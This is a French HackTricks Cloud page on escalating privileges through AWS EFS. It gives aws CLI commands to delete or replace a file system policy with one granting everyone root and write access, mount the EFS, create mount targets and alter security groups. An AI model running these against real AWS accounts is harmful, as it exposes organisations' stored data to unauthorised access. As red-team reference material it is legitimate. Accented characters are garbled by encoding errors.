HackTricks CloudAWS - EFS Privesc
Tip
Apprenez & pratiquez AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Apprenez & pratiquez GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Apprenez & pratiquez Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Soutenez HackTricks
- Consultez les subscription plans!
- Rejoignez le đŹ Discord group ou le telegram group ou suivez-nous sur Twitter đŠ @hacktricks_live.
- Partagez des hacking tricks en soumettant des PRs aux HackTricks et HackTricks Cloud github repos.
EFS
Plus dâinformations sur EFS dans :
Nâoubliez pas que, pour monter un EFS, vous devez ĂȘtre dans un sous-rĂ©seau oĂč lâEFS est exposĂ© et y avoir accĂšs (security groups). Si câest le cas, par dĂ©faut, vous pourrez toujours le monter ; cependant, sâil est protĂ©gĂ© par des IAM policies, vous devez disposer des permissions supplĂ©mentaires mentionnĂ©es ici pour y accĂ©der.
elasticfilesystem:DeleteFileSystemPolicy|elasticfilesystem:PutFileSystemPolicy
Avec lâune de ces permissions, un attaquant peut modifier la file system policy pour vous donner lâaccĂšs Ă celle-ci, ou simplement la supprimer afin que lâaccĂšs par dĂ©faut soit accordĂ©.
Pour supprimer la policy:
aws efs delete-file-system-policy \
--file-system-id <value>
Pour le changer :
aws efs put-file-system-policy --file-system-id <fs-id> --policy file:///tmp/policy.json
// Give everyone trying to mount it read, write and root access
// policy.json:
{
"Version": "2012-10-17",
"Id": "efs-policy-wizard-059944c6-35e7-4ba0-8e40-6f05302d5763",
"Statement": [
{
"Sid": "efs-statement-2161b2bd-7c59-49d7-9fee-6ea8903e6603",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": [
"elasticfilesystem:ClientRootAccess",
"elasticfilesystem:ClientWrite",
"elasticfilesystem:ClientMount"
],
"Condition": {
"Bool": {
"elasticfilesystem:AccessedViaMountTarget": "true"
}
}
}
]
}
elasticfilesystem:ClientMount|(elasticfilesystem:ClientRootAccess)|(elasticfilesystem:ClientWrite)
Avec cette permission un attaquant pourra monter lâEFS. Si la permission dâĂ©criture nâest pas accordĂ©e par dĂ©faut Ă tous ceux qui peuvent monter lâEFS, il nâaura que lâaccĂšs en lecture.
sudo mkdir /efs
sudo mount -t efs -o tls,iam <file-system-id/EFS DNS name>:/ /efs/
Les permissions supplĂ©mentaires elasticfilesystem:ClientRootAccess et elasticfilesystem:ClientWrite peuvent ĂȘtre utilisĂ©es pour Ă©crire Ă lâintĂ©rieur du systĂšme de fichiers aprĂšs son montage et pour accĂ©der Ă ce systĂšme de fichiers en tant que root.
Impact potentiel : Privesc indirecte en localisant des informations sensibles dans le systĂšme de fichiers.
elasticfilesystem:CreateMountTarget
Si un attaquant se trouve Ă lâintĂ©rieur dâun sous-rĂ©seau oĂč aucun mount target de lâEFS nâexiste, il peut simplement en crĂ©er un dans son sous-rĂ©seau avec ce privilĂšge :
# You need to indicate security groups that will grant the user access to port 2049
aws efs create-mount-target --file-system-id <fs-id> \
--subnet-id <value> \
--security-groups <value>
Impact potentiel : Privesc indirect en localisant des informations sensibles dans le systĂšme de fichiers.
elasticfilesystem:ModifyMountTargetSecurityGroups
Dans un scĂ©nario oĂč un attaquant dĂ©couvre que lâEFS a un mount target dans son sous-rĂ©seau mais aucun security group nâautorise le trafic, il pourrait simplement changer cela en modifiant les security groups sĂ©lectionnĂ©s :
aws efs modify-mount-target-security-groups \
--mount-target-id <value> \
--security-groups <value>
Impact potentiel: Privesc indirect en localisant des informations sensibles dans le systĂšme de fichiers.
Tip
Apprenez & pratiquez AWS Hacking:
Apprenez & pratiquez GCP Hacking:
Apprenez & pratiquez Az Hacking:Soutenez HackTricks
- Consultez les subscription plans!
- Rejoignez le đŹ Discord group ou le telegram group ou suivez-nous sur Twitter đŠ @hacktricks_live.
- Partagez des hacking tricks en soumettant des PRs aux HackTricks et HackTricks Cloud github repos.